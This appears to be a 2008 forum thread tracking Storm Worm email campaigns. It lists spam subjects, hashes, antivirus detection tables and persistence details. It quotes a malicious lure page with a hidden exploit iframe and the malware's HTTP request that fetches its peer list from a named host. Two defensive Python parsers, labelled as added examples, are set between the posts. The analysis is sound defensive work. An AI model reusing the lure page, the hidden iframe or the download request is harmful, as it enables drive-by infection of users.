BitDefender 7.2 2008.03.31 Trojan.Crypt.AP
CAT-QuickHeal 9.50 2008.03.31 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.03.31 -
DrWeb 4.44.0.09170 2008.03.31 -
eTrust-Vet 31.3.5658 2008.03.31 -
Ewido 4.0 2008.03.31 -
F-Prot 4.4.2.54 2008.03.30 -
F-Secure 6.70.13260.0 2008.03.31 -
FileAdvisor 1 2008.03.31 -
Fortinet 3.14.0.0 2008.03.31 -
Ikarus T3.1.1.20 2008.03.31 -
Kaspersky 7.0.0.125 2008.03.31 -
McAfee 5262 2008.03.28 -
Microsoft 1.3301 2008.03.31 -
NOD32v2 2987 2008.03.31 -
Norman 5.80.02 2008.03.31 -
Panda 9.0.0.4 2008.03.31 -
Prevx1 V2 2008.03.31 -
Rising 20.38.01.00 2008.03.31 -
Sophos 4.28.0 2008.03.31 -
Sunbelt 3.0.978.0 2008.03.18 -
Symantec 10 2008.03.31 -
TheHacker 6.2.92.259 2008.03.30 -
VBA32 3.12.6.3 2008.03.25 -
VirusBuster 4.3.26:9 2008.03.31 -
Webwasher-Gateway 6.6.2 2008.03.31 Trojan.Crypt.XPACK.Gen
<h4>
Notes
</h4>
Copies itself as %windir%\aromis.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [aromis] C:\WINDOWS\aromis.exe
Rootkit scan.
QUOTE
---- Processes - GMER 1.0.14 ----

Library C:\WINDOWS\testdll_f.dll (*** hidden *** ) @ C:\WINDOWS\aromis.exe [944] 0x00320000

---- EOF - GMER 1.0.14 ----
Kaspersky: Trojan.Win32.Agent.jem
Kimberly
Tsss StormCodec ... and what's next.
Anyways, don't fall for it.
Still has the hidden testdll_f.dll hooked into the executable. Don't look for this file on your HDD; it doesn't exist.

Kaspersky: Email-Worm.Win32.Zhelatin.wt
Kimberly
<h4>
stormcodec8.exe - win.exe - load.exe - stormcodec.exe
</h4>
File size: 132608 bytes
MD5...: f39c211e46a549646e1920755002459c
SHA1..: f9ab47c5300a34898a699ac67ad6c214649c0a0a
PEiD..: -
QUOTE
File win.exe received on 04.10.2008 01:52:00 (CET)
AhnLab-V3 2008.4.9.0 2008.04.09 -
AntiVir 7.6.0.81 2008.04.09 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.04.09 -
Avast 4.8.1169.0 2008.04.09 -
AVG 7.5.0.516 2008.04.09 -
BitDefender 7.2 2008.04.09 -
CAT-QuickHeal 9.50 2008.04.08 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.04.09 Trojan.Peed-188
DrWeb 4.44.0.09170 2008.04.09 -
eSafe 7.0.15.0 2008.04.09 Suspicious File
eTrust-Vet 31.3.5686 2008.04.10 Win32/Sintun!generic.2
Ewido 4.0 2008.04.09 -
F-Prot 4.4.2.54 2008.04.08 -
F-Secure 6.70.13260.0 2008.04.10 -
FileAdvisor 1 2008.04.10 -
Fortinet 3.14.0.0 2008.04.09 -
Ikarus T3.1.1.26 2008.04.10 Email-Worm.Win32.Zhelatin.ww
Kaspersky 7.0.0.125 2008.04.10 -
McAfee 5270 2008.04.09 -
Microsoft 1.3408 2008.04.10 -
NOD32v2 3014 2008.04.09 -
Norman 5.80.02 2008.04.09 -
Panda 9.0.0.4 2008.04.09 -
Prevx1 V2 2008.04.10 -
Rising 20.39.12.00 2008.04.08 -
Sophos 4.28.0 2008.04.10 Troj/Dorf-BA
Sunbelt 3.0.1032.0 2008.04.08 -
Symantec 10 2008.04.10 Trojan.Peacomm
TheHacker 6.2.92.271 2008.04.10 -
VBA32 3.12.6.4 2008.04.06 -
VirusBuster 4.3.26:9 2008.04.09 Worm.Zhelatin.Gen!Pac.6
Webwasher-Gateway 6.6.2 2008.04.09 Trojan.Crypt.XPACK.Gen
<h4>
Notes
</h4>
Copies itself as %windir%\kavir.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [kavir] C:\WINDOWS\kavir.exe
No hidden library in this version. The config file is not named after the executable this time, but nivavir.config.

Don't visit the pages. Depending on the browser you are using, you will get one of the file names mentioned in the post header because they are serving up exploits. For Internet Explorer and Maxthon (all IE-based ones) they start off with an adobestream exploit followed by a heap overflow. The Opera browser is served an iframe exploit. There is no exploit visible when using Firefox but this does not mean that you are safe!
Kimberly
<h4>
Recent publications
</h4>
LEET'08: Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on Storm Worm from honeyblog.

HTML version is available here.

Many thanks to Sabu75 for the link.
Kimberly
Subject:
  • Here in my heart.
Body:
  • You are the ONE http://[removed]
______________________________

The webpage contains a script in order to resize your browser window. At the time of the write up, no exploits are present on the site.
CODE
<script>
self.resizeTo(120,250);
</script>

<h4>
loveyou.exe
</h4>
File size: 151041 bytes
MD5...: 85a6e87d4a7444fd0a96f1c5e15bb13e
SHA1..: 6a88b3d5d33f2727a9eb0f62992e207e4348c050
PEiD: -
QUOTE
File loveyou.exe received on 05.19.2008 18:46:23 (CET)
AntiVir 7.8.0.19 2008.05.19 TR/Dropper.Gen
Authentium 5.1.0.4 2008.05.18 -
Avast 4.8.1195.0 2008.05.18 -
AVG 7.5.0.516 2008.05.19 I-Worm/Nuwar.R
BitDefender 7.2 2008.05.19 Trojan.Peed.PJ
CAT-QuickHeal 9.50 2008.05.19 Win32.Email-Worm.Zhelatin.yu.4
ClamAV 0.92.1 2008.05.19 -
DrWeb 4.44.0.09170 2008.05.19 Trojan.Packed.460
eSafe 7.0.15.0 2008.05.19 Suspicious File
eTrust-Vet 31.4.5798 2008.05.16 -
Ewido 4.0 2008.05.19 -
F-Prot 4.4.2.54 2008.05.16 -
F-Secure 6.70.13260.0 2008.05.19 Email-Worm.Win32.Zhelatin.yu
Fortinet 3.14.0.0 2008.05.19 -
GData 2.0.7306.1023 2008.05.19 Email-Worm.Win32.Zhelatin.yu
Ikarus T3.1.1.26.0 2008.05.19 -
Kaspersky 7.0.0.125 2008.05.19 Email-Worm.Win32.Zhelatin.yu
McAfee 5297 2008.05.17 -
Microsoft 1.3408 2008.05.13 -
NOD32v2 3110 2008.05.19 -
Norman 5.80.02 2008.05.19 -
Panda 9.0.0.4 2008.05.19 -
Prevx1 V2 2008.05.19 -
Rising 20.45.02.00 2008.05.19 -
Sophos 4.29.0 2008.05.19 -
Sunbelt 3.0.1123.1 2008.05.17 -
Symantec 10 2008.05.19 -
TheHacker 6.2.92.313 2008.05.19 -
VBA32 3.12.6.6 2008.05.18 -
VirusBuster 4.3.26:9 2008.05.19 -
Webwasher-Gateway 6.6.2 2008.05.19 Trojan.Dropper.Gen
<h4>
Notes
</h4>
Copies itself as %windir%\herjek.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [herjek] C:\WINDOWS\herjek.exe
No hidden library in this version. The configuration file containing the peers is again named after the executable, herjek.config, which is downloaded from the server with a special user agent.
GET /getbackup.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windoss NT 5.1; SV1921)
Host: cadeaux-avenue.cn
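As an added example (not the thread's code, nor anything from the malware or the tools quoted), here is a parser for the `[config]` / `[local]` / `[peers]` file format shown under "Summary" in the first post and referred to again above for herjek.config. The sample below is the thread's own five peer lines with its "etc ..." truncation left in, so the parser also shows how a stray non-peer line is skipped. Splitting each 7-byte peer value into an IPv4 address, a big-endian UDP port and one trailing type byte is an assumption made for this example because it fits the shape of the quoted values; the thread itself only says the list is "encoded". A defender would use this to pull the local UDP port and the contacted endpoints from a recovered config file as network indicators.

```python
import re
from ipaddress import IPv4Address

# Copied from the first post's "Sample" config excerpt; the list is truncated
# there with "etc ...", which is deliberately kept to exercise the skip path.
SAMPLE_CONFIG = """\
[config]
[local]
uport=6902
[peers]
00003D6C8F338A3FDD3DF3648666F55C=185E494E272400
0100A634122F3553A046EC451061927C=29F8415B46AC00
02007E238D780D25FD5511285E2E596E=29F905AC789000
03001E62DC533E7AF6161729A953891B=29F932FE26E400
0400EB5EC13599373A3D544A2D6AF94F=29FA2158703000
etc ...
"""

# 32 hex chars (a 128-bit peer id) = 14 hex chars (7 bytes of endpoint data)
PEER_LINE = re.compile(r"^([0-9A-Fa-f]{32})=([0-9A-Fa-f]{14})$")


def parse_config(text):
    """Parse the INI-like file into {'local': {key: value}, 'peers': [(id, hex)]}."""
    section, local, peers = None, {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "local" and "=" in line:
            key, value = line.split("=", 1)
            local[key.strip()] = value.strip()
        elif section == "peers":
            m = PEER_LINE.match(line)
            if m:  # anything that is not id=7bytes (e.g. "etc ...") is skipped
                peers.append((m.group(1).upper(), m.group(2).upper()))
    return {"local": local, "peers": peers}


def decode_peer(raw_hex):
    """ASSUMPTION for this example: 4 bytes IPv4 + 2 bytes big-endian port + 1 type byte."""
    data = bytes.fromhex(raw_hex)
    if len(data) != 7:
        raise ValueError("peer entry must be exactly 7 bytes")
    ip = str(IPv4Address(data[:4]))
    port = int.from_bytes(data[4:6], "big")
    return ip, port, data[6]


def local_udp_port(cfg):
    """The port the infected host listens on for its P2P traffic (uport)."""
    return int(cfg["local"].get("uport", 0))


def peer_endpoints(cfg):
    """(ip, port) for every peer, in file order."""
    return [decode_peer(raw)[:2] for _, raw in cfg["peers"]]


def high_udp_endpoints(cfg, threshold=1024):
    """Endpoints above the port threshold the first post suggests blocking outbound."""
    return [(ip, port) for ip, port in peer_endpoints(cfg) if port > threshold]


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print("local uport:", local_udp_port(cfg))
    for ip, port in peer_endpoints(cfg):
        print(f"peer {ip}:{port}")
    print("peers above 1024/udp:", len(high_udp_endpoints(cfg)))
```

Every peer in the sample decodes to a port above 1024, which is why the per-application deny-all outbound UDP policy from the first post cuts an infected host off from the rest of the network even though the file itself is never touched.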
Kimberly
Subject:
  • Deep in my heart.
  • Lucky to have you.
  • I wanna be with you.
  • For you sweetheart!
  • Only wanna be with you.
  • Nothing's Gonna Change My Love For You.
  • I belong to you.
  • Lost In Your Eyes
Body:
  • Wanna kiss you.
  • Crazy in love.
  • I'll Never Find Someone Like You.
  • Somebody loves you.
  • Lost In Your Eyes.
  • Here in my heart.
  • Love me tender, love me true.
  • Missing you.

<h4>
Detection
</h4>
File size: 140289 bytes
MD5...: c4abd43490160b4af89d68ab847abbef
SHA1..: 771b8ce326a88ea8fa9998c287a77c5a6878b2db
QUOTE
File loveyou.exe received on 06.03.2008 16:52:31 (CET)
AhnLab-V3 2008.5.30.1 2008.06.03 -
AntiVir 7.8.0.26 2008.06.03 Worm/Zhelatin.za
Authentium 5.1.0.4 2008.06.02 -
Avast 4.8.1195.0 2008.06.03 -
AVG 7.5.0.516 2008.06.03 I-Worm/Nuwar.T
BitDefender 7.2 2008.06.03 Trojan.Peed.PJ
CAT-QuickHeal 9.50 2008.06.03 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.06.03 -
DrWeb 4.44.0.09170 2008.06.03 -
eSafe 7.0.15.0 2008.06.02 Suspicious File
eTrust-Vet 31.4.5845 2008.06.03 -
Ewido 4.0 2008.06.03 -
F-Prot 4.4.4.56 2008.06.02 -
F-Secure 6.70.13260.0 2008.06.03 Email-Worm.Win32.Zhelatin.zt
Fortinet 3.14.0.0 2008.06.03 -
GData 2.0.7306.1023 2008.06.03 Email-Worm.Win32.Zhelatin.zt
Ikarus T3.1.1.26.0 2008.06.03 -
Kaspersky 7.0.0.125 2008.06.03 Email-Worm.Win32.Zhelatin.zt
McAfee 5308 2008.06.02 -
Microsoft 1.3604 2008.06.03 Backdoor:Win32/Nuwar.gen!D
NOD32v2 3154 2008.06.03 a variant of Win32/Nuwar.CU
Norman 5.80.02 2008.06.03 -
Panda 9.0.0.4 2008.06.03 -
Prevx1 V2 2008.06.03 -
Rising 20.47.12.00 2008.06.03 -
Sophos 4.29.0 2008.06.03 -
Sunbelt 3.0.1143.1 2008.06.03 -
Symantec 10 2008.06.03 Trojan.Peacomm.D
TheHacker 6.2.92.332 2008.06.03 -
VBA32 3.12.6.7 2008.06.03 -
VirusBuster 4.3.26:9 2008.06.03 -
Webwasher-Gateway 6.6.2 2008.06.03 Worm.Zhelatin.za
<h4>
Notes
</h4>
Copies itself as %windir%\mahmud.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [mahmud] C:\WINDOWS\mahmud.exe
Same User Agent and domain as on May 19.

Other current file names.

O4 - HKCU\..\Run: [abass] C:\WINDOWS\abass.exe
O4 - HKCU\..\Run: [farkrish] C:\WINDOWS\farkrish.exe
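The listings in these posts follow VirusTotal's one-line-per-vendor format, and later posts in the thread summarise the same data as a detected/total ratio. The parser below is an added example, not Kimberly's code and not anything from VirusTotal: it reads such a listing, skips the "File ... received on" header, computes the ratio, and groups the vendor labels by family through a small alias table (an assumption on my part: Zhelatin, Nuwar, Peacomm, Peed, Tibs and Dorf are mapped to one name because the thread uses them for the same Storm samples). The sample input is a constructed subset of the loveyou.exe listing above.

```python
"""Parse VirusTotal-style result listings ("Vendor Version Update Result",
one per line) such as the ones quoted in this thread, compute the
detected/total ratio, and group the vendor labels by family so the many
names for one Storm sample (Zhelatin, Nuwar, Peacomm, Peed, Tibs, Dorf)
can be compared at a glance."""
import re
from collections import Counter

# Constructed sample: the header plus a subset of the loveyou.exe listing.
SAMPLE_RESULTS = """\
File loveyou.exe received on 06.03.2008 16:52:31 (CET)
AhnLab-V3 2008.5.30.1 2008.06.03 -
AntiVir 7.8.0.26 2008.06.03 Worm/Zhelatin.za
AVG 7.5.0.516 2008.06.03 I-Worm/Nuwar.T
BitDefender 7.2 2008.06.03 Trojan.Peed.PJ
CAT-QuickHeal 9.50 2008.06.03 (Suspicious) - DNAScan
ClamAV 0.92.1 2008.06.03 -
eSafe 7.0.15.0 2008.06.02 Suspicious File
Kaspersky 7.0.0.125 2008.06.03 Email-Worm.Win32.Zhelatin.zt
Microsoft 1.3604 2008.06.03 Backdoor:Win32/Nuwar.gen!D
Symantec 10 2008.06.03 Trojan.Peacomm.D
Prevx1 V2 2008.06.03 -
"""

# Assumed alias table: vendor family names that all denote Storm in this
# thread's listings, mapped to one canonical name (substring match).
FAMILY_ALIASES = {"zhelatin": "storm", "nuwar": "storm", "peacomm": "storm",
                  "peed": "storm", "tibs": "storm", "dorf": "storm"}

DATE_RE = re.compile(r"^\d{4}\.\d{2}\.\d{2}$")  # the "last update" column


def parse_results(text):
    """Return (vendor, version, updated, result) tuples; result is None for '-'."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(maxsplit=3)
        # Skip the "File ... received on" header and anything else that is
        # not a four-column result line with a date in the third column.
        if len(parts) != 4 or not DATE_RE.match(parts[2]):
            continue
        vendor, version, updated, result = parts
        records.append((vendor, version, updated, None if result == "-" else result))
    return records


def detection_ratio(records):
    """Return (detected, total, percent) in the "18/35 (51.43%)" style used later in the thread."""
    total = len(records)
    detected = sum(1 for r in records if r[3] is not None)
    percent = round(100.0 * detected / total, 2) if total else 0.0
    return detected, total, percent


def family_of(label):
    """Canonical family for a vendor label; heuristic verdicts count as 'generic'."""
    low = label.lower()
    for needle, family in FAMILY_ALIASES.items():
        if needle in low:
            return family
    return "generic"


def family_breakdown(records):
    """Number of vendors naming each family, ignoring vendors with no detection."""
    return Counter(family_of(r[3]) for r in records if r[3] is not None)


if __name__ == "__main__":
    recs = parse_results(SAMPLE_RESULTS)
    d, t, pct = detection_ratio(recs)
    print(f"loveyou.exe (sample subset): {d}/{t} ({pct}%)")
    for fam, n in family_breakdown(recs).most_common():
        print(f"  {fam}: {n}")
```

Feeding it one of the full listings from the thread gives the same ratio format as the "20/36 (55.56%)" summaries in the later posts, and the breakdown makes it obvious when a vendor only fires a generic "Suspicious File" verdict rather than a family signature.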
Kimberly
Subject:
  • The capital of China were collapsed by earthquake.
  • Death toll in China is growing.
  • A new deadly catastrophe in China.
  • Unprecedented earthquake in China.
  • Chinese people are horrified by new earthquake.
  • Terrible earthquake devastated Beijing.
Body:
  • Strongest earthquake hits Beijing.
  • The most powerful quake hits China.
  • Recent china earthquake kills million.
  • A new powerful disaster in China.
  • 2008 Olympic Games are under the threat.
  • The massive disaster leveled the center of Beijing to the ground.

<h4>
Detection of Beijing.exe
</h4>
File size: 119296 bytes
MD5...: 0bca0670720897b55801e0e33127feb5
SHA1..: c1d707de123bc8fd4e48c2895c9976c30faefe31
QUOTE
File beijing.exe received on 06.19.2008 15:28:46 (CET)
AhnLab-V3 2008.6.19.0 2008.06.19 -
AntiVir 7.8.0.55 2008.06.19 Worm/Zhelatin.zc
Authentium 5.1.0.4 2008.06.18 -
Avast 4.8.1195.0 2008.06.18 Win32:TDrop
AVG 7.5.0.516 2008.06.19 -
BitDefender 7.2 2008.06.19 Trojan.Peed.JLV
CAT-QuickHeal 9.50 2008.06.18 -
ClamAV 0.93.1 2008.06.19 -
DrWeb 4.44.0.09170 2008.06.19 -
eSafe 7.0.15.0 2008.06.18 Suspicious File
eTrust-Vet 31.6.5887 2008.06.19 -
Ewido 4.0 2008.06.19 -
F-Prot 4.4.4.56 2008.06.18 -
F-Secure 6.70.13260.0 2008.06.19 -
Fortinet 3.14.0.0 2008.06.19 -
GData 2.0.7306.1023 2008.06.19 Win32:TDrop
Ikarus T3.1.1.26.0 2008.06.19 Email-Worm.Win32.Zhelatin.zy
Kaspersky 7.0.0.125 2008.06.19 -
McAfee 5320 2008.06.18 -
Microsoft 1.3604 2008.06.19 Backdoor:Win32/Nuwar.gen!D
NOD32v2 3200 2008.06.19 Win32/Nuwar
Norman 5.80.02 2008.06.17 -
Panda 9.0.0.4 2008.06.18 Suspicious file
Prevx1 V2 2008.06.19 -
Rising 20.49.32.00 2008.06.19 -
Sophos 4.30.0 2008.06.19 W32/Nuwar-E
Sunbelt 3.0.1153.1 2008.06.15 -
Symantec 10 2008.06.19 Trojan.Peacomm.D
TheHacker 6.2.92.354 2008.06.18 -
TrendMicro 8.700.0.1004 2008.06.19 -
VBA32 3.12.6.7 2008.06.19 -
VirusBuster 4.3.26:9 2008.06.12 -
Webwasher-Gateway 6.6.2 2008.06.19 Worm.Zhelatin.zc
<h4>
Notes
</h4>
Copies itself as %windir%\msvupdater.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [msvupdater] C:\WINDOWS\msvupdater.exe
Config file: msvupdater.config

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script as seen below, which decodes to another obfuscated script. Once completely decoded, several exploits are visible.
CODE
<html>
<head>
<title>Strongest earthquake hits Beijing</title>
</head>
<body>
<table align="center" width="410" border=0>
<tr><td>A new powerful disaster just occurred in China. The most deadly, 9 magnitude, earthquake took away million of lives in the heart of China, Beijing.  Rapidly growing panic paralyzed life of Chinese capital. 2008 Olympic Games are under the threat of failure. Click on the video to see the details of this terrible disaster and choose either "Open" or "Run".
<br><br><a href="beijing.exe"><img border=0 src="mov.gif"></a></td></tr>
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</table>
</body>
</html>
Note: Partial code due to its length.
Kimberly
A bit more on the obfuscated code. The first part are the usual ones ....
______________________________

AOL SuperBuddy ActiveX.
http://www.symantec.com/avcenter/attack_sigs/s22269.html
______________________________

NCTAudioFile2
http://www.kb.cert.org/vuls/id/292713
______________________________

GomWebCtrl.GomManager.1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5779
______________________________

RealPlayer
http://www.kb.cert.org/vuls/id/831457
______________________________

WebviewFolderIcon.WebviewFolderIcon.1
http://www.securiteam.com/exploits/6A0060AH5G.html
http://osvdb.org/27110
______________________________

BaiduBar
http://archives.neohapsis.com/archives/ful...07-08/0015.html
Kimberly
Back to the love theme ... "sponsored" by 123greetings.com lol .... and a fake advert banner.

Subject:
  • You are the one.
  • Not the same without you.
  • Miss you with all my heart.
  • Deeply in love with you.
Body:
  • Lucky to have you.
  • You feel up my senses.
  • Nothing's Gonna Change My Love For You.
  • Deeply in love with you.
  • Can't stay away from you.

<h4>
Detection of mylove.exe / winner.exe
</h4>
File size: 119296 bytes
MD5...: a7376e394ca8885bdccfb052a01db18c
SHA1..: 2748928583db771c88c930b770a447d9fec6cb85
SHA256: 539459925b900a8666dd78eb4acf12c28e1f713bf96dc8633082b93ba278d51f
PEiD..: -
QUOTE
File mylove.exe received on 07.01.2008 06:26:46 (CET)
AhnLab-V3 2008.7.1.0 2008.07.01 -
AntiVir 7.8.0.59 2008.06.30 -
Authentium 5.1.0.4 2008.07.01 -
Avast 4.8.1195.0 2008.06.30 -
AVG 7.5.0.516 2008.06.30 -
BitDefender 7.2 2008.07.01 Trojan.Peed.JLV
CAT-QuickHeal 9.50 2008.06.30 -
ClamAV 0.93.1 2008.07.01 -
DrWeb 4.44.0.09170 2008.06.30 -
eSafe 7.0.17.0 2008.06.30 Suspicious File
eTrust-Vet 31.6.5916 2008.07.01 -
Ewido 4.0 2008.06.27 -
F-Prot 4.4.4.56 2008.07.01 -
F-Secure 7.60.13501.0 2008.06.26 -
Fortinet 3.14.0.0 2008.07.01 -
GData 2.0.7306.1023 2008.07.01 -
Ikarus T3.1.1.26.0 2008.07.01 Email-Worm.Win32.Zhelatin.zy
Kaspersky 7.0.0.125 2008.07.01 -
McAfee 5328 2008.06.30 -
Microsoft 1.3704 2008.07.01 -
NOD32v2 3229 2008.06.30 -
Norman 5.80.02 2008.06.30 -
Panda 9.0.0.4 2008.07.01 -
Prevx1 V2 2008.07.01 -
Rising 20.51.10.00 2008.07.01 -
Sophos 4.30.0 2008.07.01 -
Sunbelt 3.1.1509.1 2008.07.01 -
Symantec 10 2008.07.01 -
TheHacker 6.2.96.365 2008.07.01 -
TrendMicro 8.700.0.1004 2008.06.30 -
VBA32 3.12.6.8 2008.06.30 -
VirusBuster 4.5.11.0 2008.06.30 -
Webwasher-Gateway 6.6.2 2008.06.30 -
<h4>
Notes
</h4>
Copies itself as %windir%\msvecurity.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [msvecurity] C:\WINDOWS\msvecurity.exe
Config file: msvecurity.config

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20th.
Kimberly
Subject:
  • American Independence Day.
  • Celebrations have already begun.
  • Celebrate the spirit of America.
  • Stars and Strips forever.
  • Spectacular fireworks show.
  • Amazing Independence Day show.
  • Long Live America.
  • The best firework you've ever seen.
Body:
  • Long Live America.
  • Amazing Independence Day salute.
  • Bright and joyful Fourth of July.
  • America for You and Me.
  • Celebrating the spirit of our Country.
  • Time for Fireworks.
  • Celebrate Independence.
  • Proud to be an American.

<h4>
Detection of fireworks.exe
</h4>
File size: 118785 bytes
MD5...: d40826234a66bba2039c5b34967a92ec
SHA1..: 411bac4a0aacb0a4cc2320295bf3f9ac4a029f1e
SHA256: 1122c5bae6aeaee82682fd36c9338013abec118fe75abf91b7ea3594f0af0d7f
PEiD..: -
QUOTE
File fireworks.exe received on 07.04.2008 00:35:38 (CET)
AhnLab-V3 2008.7.4.0 2008.07.03 -
AntiVir 7.8.0.64 2008.07.03 WORM/Zhelatin.Gen
Authentium 5.1.0.4 2008.07.03 -
Avast 4.8.1195.0 2008.07.03 -
AVG 7.5.0.516 2008.07.03 I-Worm/Nuwar.U
BitDefender 7.2 2008.07.03 Trojan.Peed.JLV
CAT-QuickHeal 9.50 2008.07.03 Win32.Trojan-Downloader.Cntr.ca.3
ClamAV 0.93.1 2008.07.03 -
DrWeb 4.44.0.09170 2008.07.03 Trojan.Packed.555
eSafe 7.0.17.0 2008.07.03 Suspicious File
eTrust-Vet 31.6.5922 2008.07.02 -
Ewido 4.0 2008.07.03 -
F-Prot 4.4.4.56 2008.07.03 -
F-Secure 7.60.13501.0 2008.07.03 -
Fortinet 3.14.0.0 2008.07.04 -
GData 2.0.7306.1023 2008.07.03 Email-Worm.Win32.Zhelatin.add
Ikarus T3.1.1.26.0 2008.07.03 Email-Worm.Win32.Zhelatin.zy
Kaspersky 7.0.0.125 2008.07.03 Email-Worm.Win32.Zhelatin.add
McAfee 5331 2008.07.03 W32/Nuwar@MM
Microsoft 1.3704 2008.07.03 Backdoor:Win32/Nuwar.gen!D
NOD32v2 3239 2008.07.03 Win32/Nuwar.DC
Norman 5.80.02 2008.07.03 -
Panda 9.0.0.4 2008.07.03 Suspicious file
Prevx1 V2 2008.07.04 -
Rising 20.51.32.00 2008.07.03 -
Sophos 4.30.0 2008.07.03 Troj/Dorf-BP
Sunbelt 3.1.1509.1 2008.07.03 -
Symantec 10 2008.07.03 Trojan.Peacomm.D
TheHacker 6.2.96.370 2008.07.04 -
TrendMicro 8.700.0.1004 2008.07.03 -
VBA32 3.12.6.8 2008.07.03 -
VirusBuster 4.5.11.0 2008.07.03 Trojan.Tibs.AMZ
Webwasher-Gateway 6.6.2 2008.07.03 Worm.Zhelatin.Gen
<h4>
Notes
</h4>
Copies itself as %windir%\msserv.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [msserv] C:\WINDOWS\msserv.exe
Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20th.
Kimberly
Jumping to World War III subjects after Independence Day ... logical, nah?

Subject:
  • The World War III has already begun.
  • War between USA&Iran.
Body:
  • The World War III has already begun.
  • More than 10000 Iranians were murdered.
  • US Army crossed Iran's borders.
  • War between USA&Iran.

<h4>
Detection of iran_occupation.exe
</h4>
File size: 118273 bytes
MD5...: d3547e067aff8bb2e3c250d9c541ea78
SHA1..: da99d4061e078c35a26459db3971eb8ba6600277
SHA256: 3e9135f33980783bf8e10faa339f9cfd84f4fb074c659b0883918bc4bf66e56f
PEiD..: -
QUOTE
File iran_occupation.exe received on 07.09.2008 00:58:56 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.7.9.0 2008.07.08 -
AntiVir 7.8.0.64 2008.07.08 -
Authentium 5.1.0.4 2008.07.08 -
Avast 4.8.1195.0 2008.07.08 -
AVG 7.5.0.516 2008.07.08 I-Worm/Nuwar.U
BitDefender 7.2 2008.07.08 Dropped:Trojan.Peed.PM
CAT-QuickHeal 9.50 2008.07.08 -
ClamAV 0.93.1 2008.07.08 -
DrWeb 4.44.0.09170 2008.07.08 -
eSafe 7.0.17.0 2008.07.08 Suspicious File
eTrust-Vet 31.6.5937 2008.07.08 -
Ewido 4.0 2008.07.08 -
F-Prot 4.4.4.56 2008.07.08 -
F-Secure 7.60.13501.0 2008.07.08 -
Fortinet 3.14.0.0 2008.07.08 -
GData 2.0.7306.1023 2008.07.08 -
Ikarus T3.1.1.26.0 2008.07.08 -
Kaspersky 7.0.0.125 2008.07.09 -
McAfee 5334 2008.07.08 -
Microsoft 1.3704 2008.07.09 -
NOD32v2 3252 2008.07.08 -
Norman 5.80.02 2008.07.08 -
Panda 9.0.0.4 2008.07.08 Suspicious file
Prevx1 V2 2008.07.09 -
Rising 20.52.12.00 2008.07.08 -
Sophos 4.31.0 2008.07.08 -
Sunbelt 3.1.1509.1 2008.07.04 -
Symantec 10 2008.07.09 -
TheHacker 6.2.96.374 2008.07.07 -
TrendMicro 8.700.0.1004 2008.07.08 -
VBA32 3.12.6.8 2008.07.08 -
VirusBuster 4.5.11.0 2008.07.08 -
Webwasher-Gateway 6.6.2 2008.07.08 -
<h4>
Notes
</h4>
Copies itself as %windir%\msserv.exe. Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time. Will also request inbound & outbound connections if your firewall intercepts them.

Note: %windir% is a variable that refers to the Windows folder. By default, this is C:\Windows (Windows 95/98/Me, Windows XP), C:\Winnt (Windows NT/2000).

Visible signs.
O4 - HKCU\..\Run: [msserv] C:\WINDOWS\msserv.exe
Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20th.
CODE
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
If the exploits don't trigger anything, a click on the link will download iran_occupation.exe, a click on the "advertisement banner" will download form.exe.
Kimberly
<h4>
Back to the rootkits
</h4>
Subject:
  • Death of the U.S Dollar.
  • Bye bye dollar, hello amero.
